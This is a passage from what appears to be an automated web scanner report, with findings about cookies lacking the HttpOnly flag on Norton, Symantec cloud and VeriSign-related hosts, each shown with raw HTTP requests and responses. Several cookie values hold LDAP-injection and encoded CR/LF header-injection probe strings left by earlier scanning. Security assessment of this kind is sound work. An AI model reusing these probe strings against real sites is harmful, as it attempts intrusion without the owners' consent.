Path:
/ps
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ LASTTIME_CV_DATE=Sep-09-2011 14:37:23; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ps HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:23 GMT Location: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=18a29e71-5447-4147-9046-865f8a1fce521315604243554Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:23; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 413 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/estore/mf/la...[SNIP]...
10.45. http://buy.norton.com/special-promotions
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy.norton.com
Path:
/special-promotions
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /special-promotions HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:25 GMT Location: http://buy.norton.com/estore/mf/landingPromotion?rdid=4d1e0611-4d59-4d29-9f22-ad1cbf72a98d1315604245447Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 401 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/estore/mf/la...[SNIP]...
10.46. http://buy.norton.com/support
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy.norton.com
Path:
/support
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT COUNTRY=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ LANGUAGE=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ CurrentSubChannelCookieName=Unknown; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /support HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:38:21 GMT Location: http://www.norton.com/onlinehelpSet-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: CurrentSubChannelCookieName=Unknown; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 259 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://www.norton.com/onlinehelp">...[SNIP]...
10.47. http://buy.symanteccloud.com/freetrial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy.symanteccloud.com
Path:
/freetrial
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /freetrial HTTP/1.1 Host: buy.symanteccloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:38:21 GMT Location: http://buy.symanteccloud.com/estore/mf/smbEmailTrialPage?sfid=LsGRTqHN43HsnsxPPpQZP3Tj9CJ21WWwv1yRwH0vnzd82cf97GNT!334566439!1315604301412 Set-Cookie: COUNTRY=US; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=en; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMTSet-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMTSet-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LANGUAGE=en; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: JSESSIONID=LsGRTqHN43HsnsxPPpQZP3Tj9CJ21WWwv1yRwH0vnzd82cf97GNT!334566439; path=/; HttpOnly X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close Content-Length: 471 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.symanteccloud.com/estor...[SNIP]...
10.48. http://buy.symanteccloud.com/smbstore
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy.symanteccloud.com
Path:
/smbstore
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /smbstore HTTP/1.1 Host: buy.symanteccloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:38:21 GMT Location: http://buy.symanteccloud.com/estore/mf/smbHomePage?sfid=BcWpTqHN0cLLbNtj50T02T9jsChhh86cK9wmykNgQsTJZ1p4QRP9!334566439!1315604301665 Set-Cookie: COUNTRY=US; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=en; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMTSet-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMTSet-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LANGUAGE=en; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: JSESSIONID=BcWpTqHN0cLLbNtj50T02T9jsChhh86cK9wmykNgQsTJZ1p4QRP9!334566439; path=/; HttpOnly X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close Content-Length: 459 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.symanteccloud.com/estor...[SNIP]...
10.49. http://com-verisign.netmng.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://com-verisign.netmng.com
Path:
/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:evo5_VERISIGN=xep22ngsyerii%7ChA01%2FrwSc8JE1KL%2BNF3RVTo25kmnDoHeqB4wQZyhagZZu%2F%2BudZozezKeJLE7KBK%2BUjUxXlIeDROFZHLovHD35a7MzKnV4tnniULPz80oJzXTjZCQuH3rEYszto4j5kdWKlao%2B92ozzrCF1iFudKJH42aETL2etzFNY%2F7zPIZWcbiqGvcagHruGjsS4FSqBNpnzLrgd77H3EQG8j%2FXWqODQ%3D%3D; expires=Sat, 10-Mar-2012 21:24:39 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /?async=1&ref= HTTP/1.1 Host: com-verisign.netmng.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1; evo5_VERISIGN=xep22ngsyerii%7CzPCBedpYRoO6OzhXoTF9q%2FaQjQpstH0WqFCxsh5%2B48J3547ECvJaebMq81oWRc3MP36Ne8FDKqi2tKvM0qAtvn5eUZVLjXQuMBCzsj9xlU6q8vkojmNUdsxdhJSq0RYJ%2FgEF5%2FA69puw0HLQJ9EPXM6sL1Ue6IGucoZYZgTJQnZo9CTdABHM4ueiLU%2FDJA8GIJKj5bIIOmyH%2FBCLQ0VIEg%3D%3D
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:39 GMT Server: Apache/2.2.9 P3P: policyref="http://com-verisign.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV" Expires: Wed, 07 Sep 2011 21:24:39 GMT Last-Modified: Wed, 07 Sep 2011 21:24:39 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cacheSet-Cookie: evo5_VERISIGN=xep22ngsyerii%7ChA01%2FrwSc8JE1KL%2BNF3RVTo25kmnDoHeqB4wQZyhagZZu%2F%2BudZozezKeJLE7KBK%2BUjUxXlIeDROFZHLovHD35a7MzKnV4tnniULPz80oJzXTjZCQuH3rEYszto4j5kdWKlao%2B92ozzrCF1iFudKJH42aETL2etzFNY%2F7zPIZWcbiqGvcagHruGjsS4FSqBNpnzLrgd77H3EQG8j%2FXWqODQ%3D%3D; expires=Sat, 10-Mar-2012 21:24:39 GMT; path=/ Content-Length: 3418 Connection: close Content-Type: text/html; charset=UTF-8 function json_encode(expr){var str='';switch(typeof(expr)){case"object":if(expr==null){str="null"}else if(expr.constructor==Date){str="\""+expr.getFullYear()+"-"+String(exp.getMonth()+100).substr(1)+"...[SNIP]...
10.50. http://com-verisign.netmng.com//
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://com-verisign.netmng.com
Path:
//
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:evo5_VERISIGN=xep22ngsyerii%7COWn3FV9W0IGSJLrIppIRrZfSVe1We35EI4V4gBbixt8vL04ZKRREeQ778xI3DBjSo3Pq49K1cfcVvCg7qSIKn44I4XJ6cPR3Yj9Y3%2BMmEuQ5%2FYKzCkMnasBxmIRyKGTNYwlD1dvGPKbFxRFCvXppOCDQTBscyOfjUpXgtoyIAMmYbof2%2FajobILQpOxOi2Hs0x9UdZmRfM%2Fuoq9V0S17NeIqzDx%2BsP4gdfn5KCU%2F47pq%2B7rEF0aHB6ftFm0dez3T; expires=Sat, 10-Mar-2012 21:28:22 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET //?function=nmHandshake&rand=0.2648393476847559&nm_input_data= HTTP/1.1 Host: com-verisign.netmng.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1; evo5_VERISIGN=xep22ngsyerii%7COWn3FV9W0IGSJLrIppIRrZfSVe1We35EI4V4gBbixt8vL04ZKRREeQ778xI3DBjSo3Pq49K1cfcVvCg7qSIKn44I4XJ6cPR3Yj9Y3%2BMmEuQ5%2FYKzCkMnasBxmIRyKGTNYwlD1dvGPKbFxRFCvXppOCDQTBscyOfjUpXgtoyIAMmYbof2%2FajobILQpOxOi2Hs0x9UdZmRfM%2Fuoq9V0S17NeIqzDx%2BsP4gdfn5KCU%2F47pq%2B7rEF0aHB6ftFm0dez3T
Response
